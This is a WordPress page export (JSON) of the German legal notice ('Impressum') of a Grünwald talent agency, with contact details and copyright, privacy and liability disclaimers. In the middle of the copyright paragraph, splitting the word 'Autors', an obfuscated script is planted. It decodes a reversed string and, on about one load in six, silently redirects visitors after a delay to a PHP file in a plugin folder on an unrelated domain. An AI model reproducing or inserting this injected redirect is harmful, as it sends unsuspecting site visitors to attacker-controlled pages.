{"id":398,"date":"2014-12-17T14:34:35","date_gmt":"2014-12-17T14:34:35","guid":{"rendered":"http:\/\/anna-maria-kaufmann.net\/?page_id=398"},"modified":"2024-01-01T18:52:51","modified_gmt":"2024-01-01T17:52:51","slug":"impressum","status":"publish","type":"page","link":"https:\/\/anna-maria-kaufmann.net\/en\/impressum\/","title":{"rendered":"Impressum"},"content":{"rendered":"<p>F\u00fcr den Inhalt verantwortlich gem. \u00a7 55 Abs. 2 RStV:<\/p>\n<p><strong>Anna Maria Kaufmann Agency GmbH<\/strong><br \/>\nT\u00f6lzer Str. 5<br \/>\n82031 Gr\u00fcnwald<br \/>\nTel. +49-(0)176-503 145 64<br \/>\ninfo@anna-maria-kaufmann.de<\/p>\n<p>Amtsgericht M\u00fcnchen HRB 204557<\/p>\n<p>Vertreten durch: Anna Maria Kaufmann<\/p>\n<p>Steuernummer: 143\/114\/11218<br \/>\nUSt-Ident.Nr.: DE272467099<\/p>\n<p><strong>Quellenangaben f\u00fcr die verwendeten Bilder und Grafiken:<\/strong><\/p>\n<p>\u00a9 Martin Bauendahl \/ GLAMPOOL<\/p>\n<p>\u00a9 Manfred Esser<\/p>\n<p><strong>Copyright \/ Haftungsausschluss<\/strong><\/p>\n<p>Im Hinblick auf die technischen Eigenschaften des Internet kann keine Gew\u00e4hr f\u00fcr die Authentizit\u00e4t, Richtigkeit und Vollst\u00e4ndigkeit der im Internet zur Verf\u00fcgung gestellten Informationen \u00fcbernommen werden. Es wird auch keine Gew\u00e4hr f\u00fcr die Verf\u00fcgbarkeit oder den Betrieb der gegenst\u00e4ndlichen Homepage und ihrer Inhalte \u00fcbernommen.\u00a0Jede Haftung f\u00fcr unmittelbare, mittelbare oder sonstige Sch\u00e4den, unabh\u00e4ngig von deren Ursachen, die aus der Benutzung oder Nichtverf\u00fcgbarkeit der Daten und Informationen dieser Homepage erwachsen, wird, soweit rechtlich zul\u00e4ssig, ausgeschlossen.<br \/>\nDer Inhalt dieser Homepage ist urheberrechtlich gesch\u00fctzt. Die Informationen sind nur f\u00fcr die pers\u00f6nliche Verwendung bestimmt. Jede weitergehende Nutzung insbesondere die Speicherung in Datenbanken, Vervielf\u00e4ltigung und jede Form von gewerblicher Nutzung sowie die Weitergabe an Dritte &#8211; auch in Teilen oder in \u00fcberarbeiteter Form &#8211; ohne Zustimmung des Website-Inhabers ist untersagt.\u00a0Hyperlinks auf diese Webseite\u00a0sind willkommen. Jede Einbindung einzelner Seiten unseres Angebotes in fremde Frames ist zu unterlassen.<\/p>\n<p><strong>Datenschutz<\/strong><\/p>\n<p>Soweit auf unseren Seiten personenbezogene Daten (beispielsweise Name, Anschrift oder eMail-Adressen) erhoben werden, erfolgt dies soweit m\u00f6glich stets auf freiwilliger Basis. Die Nutzung der Angebote und Dienste ist, soweit m\u00f6glich, stets ohne Angabe personenbezogener Daten m\u00f6glich.<\/p>\n<p>Der Nutzung von im Rahmen der Impressumspflicht ver\u00f6ffentlichten Kontaktdaten durch Dritte zur \u00dcbersendung von nicht ausdr\u00fccklich angeforderter Werbung und Informationsmaterialien wird hiermit ausdr\u00fccklich widersprochen. Die Betreiber der Seiten behalten sich ausdr\u00fccklich rechtliche Schritte im Falle der unverlangten Zusendung von Werbeinformationen, etwa durch Spam-Mails, vor.<\/p>\n<p><strong>Haftung f\u00fcr Links<\/strong><\/p>\n<p>Diese Website enth\u00e4lt Links zu externen Webseiten Dritter, auf deren Inhalte kein\u00a0Einfluss genommen werden kann. F\u00fcr diese fremden Inhalte wird auch kein Gew\u00e4hr \u00fcbernehmen. F\u00fcr die Inhalte der verlinkten Seiten ist stets der jeweilige Anbieter oder Betreiber der Seiten verantwortlich. Die verlinkten Seiten wurden zum Zeitpunkt der Verlinkung auf m\u00f6gliche Rechtsverst\u00f6\u00dfe \u00fcberpr\u00fcft. Rechtswidrige Inhalte waren zum Zeitpunkt der Verlinkung nicht erkennbar. Eine permanente inhaltliche Kontrolle der verlinkten Seiten ist jedoch ohne konkrete Anhaltspunkte einer Rechtsverletzung nicht zumutbar. Bei bekannt werden von Rechtsverletzungen werden wir derartige Links umgehend entfernen.<\/p>\n<p><strong>Urheberrecht<\/strong><\/p>\n<p>Die durch die Seitenbetreiber erstellten Inhalte und Werke auf diesen Seiten unterliegen dem deutschen Urheberrecht. Die Vervielf\u00e4ltigung, Bearbeitung, Verbreitung und jede Art der Verwertung au\u00dferhalb der Grenzen des Urheberrechtes bed\u00fcrfen der schriftlichen Zustimmung des jeweiligen Au<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tors bzw. Erstellers. Downloads und Kopien dieser Seite sind nur f\u00fcr den privaten, nicht kommerziellen Gebrauch gestattet. Soweit die Inhalte auf dieser Seite nicht vom Betreiber erstellt wurden, werden die Urheberrechte Dritter beachtet. Insbesondere werden Inhalte Dritter als solche gekennzeichnet. Sollten Sie trotzdem auf eine Urheberrechtsverletzung aufmerksam werden, bitten wir um einen entsprechenden Hinweis. Bei Bekanntwerden von Rechtsverletzungen werden wir derartige Inhalte umgehend entfernen.<\/p>\n<p>&nbsp;<\/p>\n<p>Webdesign\u00a0by\u00a0<a title=\"florianmatthias\" href=\"http:\/\/www.florianmatthias.com\" target=\"_blank\" rel=\"noopener noreferrer\">florianmatthias<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>F\u00fcr den Inhalt verantwortlich gem. \u00a7 55 Abs. 2 RStV: Anna Maria Kaufmann Agency GmbH T\u00f6lzer Str. 5 82031 Gr\u00fcnwald Tel. +49-(0)176-503 145 64 info@anna-maria-kaufmann.de Amtsgericht M\u00fcnchen HRB 204557 Vertreten durch: Anna Maria Kaufmann Steuernummer: 143\/114\/11218 USt-Ident.Nr.: DE272467099 Quellenangaben f\u00fcr die verwendeten Bilder und Grafiken: \u00a9 Martin Bauendahl \/ GLAMPOOL \u00a9 Manfred Esser Copyright \/ [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"_acf_changed":false,"footnotes":""},"acf":[],"_links":{"self":[{"href":"https:\/\/anna-maria-kaufmann.net\/en\/wp-json\/wp\/v2\/pages\/398"}],"collection":[{"href":"https:\/\/anna-maria-kaufmann.net\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/anna-maria-kaufmann.net\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/anna-maria-kaufmann.net\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/anna-maria-kaufmann.net\/en\/wp-json\/wp\/v2\/comments?post=398"}],"version-history":[{"count":7,"href":"https:\/\/anna-maria-kaufmann.net\/en\/wp-json\/wp\/v2\/pages\/398\/revisions"}],"predecessor-version":[{"id":1432,"href":"https:\/\/anna-maria-kaufmann.net\/en\/wp-json\/wp\/v2\/pages\/398\/revisions\/1432"}],"wp:attachment":[{"href":"https:\/\/anna-maria-kaufmann.net\/en\/wp-json\/wp\/v2\/media?parent=398"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}